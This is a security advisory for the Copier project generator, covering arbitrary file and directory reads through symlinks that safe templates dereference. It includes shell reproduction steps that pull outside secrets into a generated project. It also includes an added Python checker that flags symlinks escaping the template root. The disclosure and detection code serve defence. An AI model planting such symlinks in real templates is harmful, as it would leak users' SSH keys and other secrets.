GHSA-xjhm-gp88-8pfx

Source
https://github.com/advisories/GHSA-xjhm-gp88-8pfx
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-xjhm-gp88-8pfx/GHSA-xjhm-gp88-8pfx.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-xjhm-gp88-8pfx
Aliases
Published
2026-01-21T22:08:48Z
Modified
2026-01-22T15:51:37.403035Z
Severity
  • 6.8 (Medium) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Summary
Copier safe template has arbitrary filesystem read access via symlinks when _preserve_symlinks: false
Details

Impact

Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions, which would require passing the --UNSAFE / --trust flag. As it turns out, a safe template can currently include arbitrary files and directories outside the local template clone location by using symlinks together with _preserve_symlinks: false (which is Copier's default setting): symlinks are dereferenced during rendering, so whatever they point to is copied into the generated project.

Imagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations and hopes for a user to push the generated project to a public location like github.com where the template author can extract the secrets.

Reproducible example:

  • Illegally include a file in the generated project via symlink resolution:

    echo "s3cr3t" > secret.txt
    
    mkdir src/
    pushd src/
    ln -s ../secret.txt stolen-secret.txt
    popd
    
    uvx copier copy src/ dst/
    
    cat dst/stolen-secret.txt
    # s3cr3t
    
  • Illegally include a directory in the generated project via symlink resolution:

    mkdir secrets/
    pushd secrets/
    echo "s3cr3t" > secret.txt
    popd
    
    mkdir src/
    pushd src/
    ln -s ../secrets stolen-secrets
    popd
    
    uvx copier copy src/ dst/
    
    tree dst/
    # dst/
    # └── stolen-secrets
    #     └── secret.txt
    #
    # 1 directory, 1 file
    cat dst/stolen-secrets/secret.txt
    # s3cr3t
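Added example, not part of the advisory and not Copier's own code: a pre-render check that walks a template clone without following links, reports every symlink whose resolved target lies outside the clone root, rebuilds the two scenarios above in a temporary directory, shows that a dereferencing copy leaks the external content, and shows a guarded copy refusing to proceed. The names find_escaping_symlinks, guarded_copy and demo are this example's own, and shutil.copytree stands in for Copier's rendering step (symlinks=False mirrors the _preserve_symlinks: false behaviour described above).

```python
"""Detect template symlinks that resolve outside the template root.

Example code added here; it is not Copier's implementation. The secret
files and template layout are constructed in a temporary directory.
"""
from __future__ import annotations

import os
import shutil
import tempfile
from pathlib import Path


def find_escaping_symlinks(template_root: str | os.PathLike) -> list[tuple[Path, Path]]:
    """Return (link, resolved_target) pairs for symlinks that escape the root.

    followlinks=False keeps os.walk from descending into symlinked
    directories, so a link to an outside directory is reported once rather
    than traversed. Dangling links are reported too: the target may not
    exist on the template author's machine but may exist on the user's.
    """
    root = Path(template_root).resolve(strict=True)
    escaping: list[tuple[Path, Path]] = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            target = link.resolve(strict=False)
            # A target is inside the template only if root is one of its parents.
            if target != root and root not in target.parents:
                escaping.append((link, target))
    return escaping


def guarded_copy(template_root: str | os.PathLike, dest: str | os.PathLike) -> Path:
    """Copy the template only if no symlink escapes the root; refuse otherwise.

    This is the behaviour a hardened generator should have: the scan runs
    before any file is read, so no external content is ever touched.
    """
    root = Path(template_root).resolve(strict=True)
    bad = find_escaping_symlinks(root)
    if bad:
        names = ", ".join(str(link.relative_to(root)) for link, _ in bad)
        raise ValueError(f"refusing to render: symlinks escape template root: {names}")
    return Path(shutil.copytree(root, dest, symlinks=False))


def demo() -> dict:
    """Rebuild the advisory's file and directory scenarios and run both copies."""
    base = Path(tempfile.mkdtemp(prefix="copier-symlink-demo-"))
    # Constructed stand-ins for secrets that live outside the template clone.
    (base / "secret.txt").write_text("s3cr3t\n")
    (base / "secrets").mkdir()
    (base / "secrets" / "secret.txt").write_text("s3cr3t\n")

    src = base / "src"
    src.mkdir()
    (src / "README.md").write_text("# benign template file\n")
    (src / "ok.txt").symlink_to("README.md")                  # stays inside root
    (src / "stolen-secret.txt").symlink_to("../secret.txt")   # file escape
    (src / "stolen-secrets").symlink_to("../secrets")         # directory escape

    escaping = sorted(link.name for link, _ in find_escaping_symlinks(src))

    # Dereferencing copy: the same thing the default setting does during
    # rendering. Both external secrets end up inside the generated project.
    leaked = Path(shutil.copytree(src, base / "dst-follow", symlinks=False))
    leaked_file = (leaked / "stolen-secret.txt").read_text().strip()
    leaked_dir = (leaked / "stolen-secrets" / "secret.txt").read_text().strip()

    # Guarded copy: refuses before reading anything outside the template.
    try:
        guarded_copy(src, base / "dst-guarded")
        refused = False
    except ValueError:
        refused = True
    guarded_exists = (base / "dst-guarded").exists()

    shutil.rmtree(base)
    return {
        "escaping": escaping,
        "leaked_file": leaked_file,
        "leaked_dir": leaked_dir,
        "refused": refused,
        "guarded_exists": guarded_exists,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The inside/outside test compares resolved paths rather than the link text, so a chain such as a link to another link that finally lands outside the clone is caught as well; the in-tree link ok.txt is not reported, which is the false-positive case a check like this must get right before it can gate rendering.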
    

Patches

n/a

Workarounds

n/a

References

n/a

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-21T22:08:48Z",
    "severity": "MODERATE",
    "nvd_published_at": "2026-01-21T23:15:52Z",
    "cwe_ids": [
        "CWE-61"
    ]
}
Affected packages

PyPI / copier

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
9.11.2

Affected versions

2.*

2.0.0
2.0.1
2.1.0
2.2.1
2.2.2
2.2.3
2.3
2.3.1
2.3.2
2.3.3
2.4.0
2.4.1
2.4.2
2.5.0
2.5.1

3.*

3.0.0a3
3.0.0a5
3.0.0a6
3.0.0a7
3.0.0a8
3.0.0b1
3.0.1
3.0.2
3.0.3
3.0.4
3.0.5
3.0.6
3.1.0
3.2.0

4.*

4.0.0
4.0.1
4.0.2
4.1.0

5.*

5.0.0
5.1.0

6.*

6.0.0a0
6.0.0a2
6.0.0a3
6.0.0a4
6.0.0a5
6.0.0a6
6.0.0a7
6.0.0a9
6.0.0b0
6.0.0
6.1.0
6.2.0

7.*

7.0.1
7.1.0a0
7.1.0
7.2.0

8.*

8.0.0
8.1.0
8.2.0
8.3.0

9.*

9.0.1
9.1.0
9.1.1
9.2.0
9.3.0
9.3.1
9.4.0
9.4.1
9.5.0
9.6.0
9.7.0
9.7.1
9.8.0
9.9.0
9.9.1
9.10.0
9.10.1
9.10.2
9.10.3
9.11.0
9.11.1

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-xjhm-gp88-8pfx/GHSA-xjhm-gp88-8pfx.json"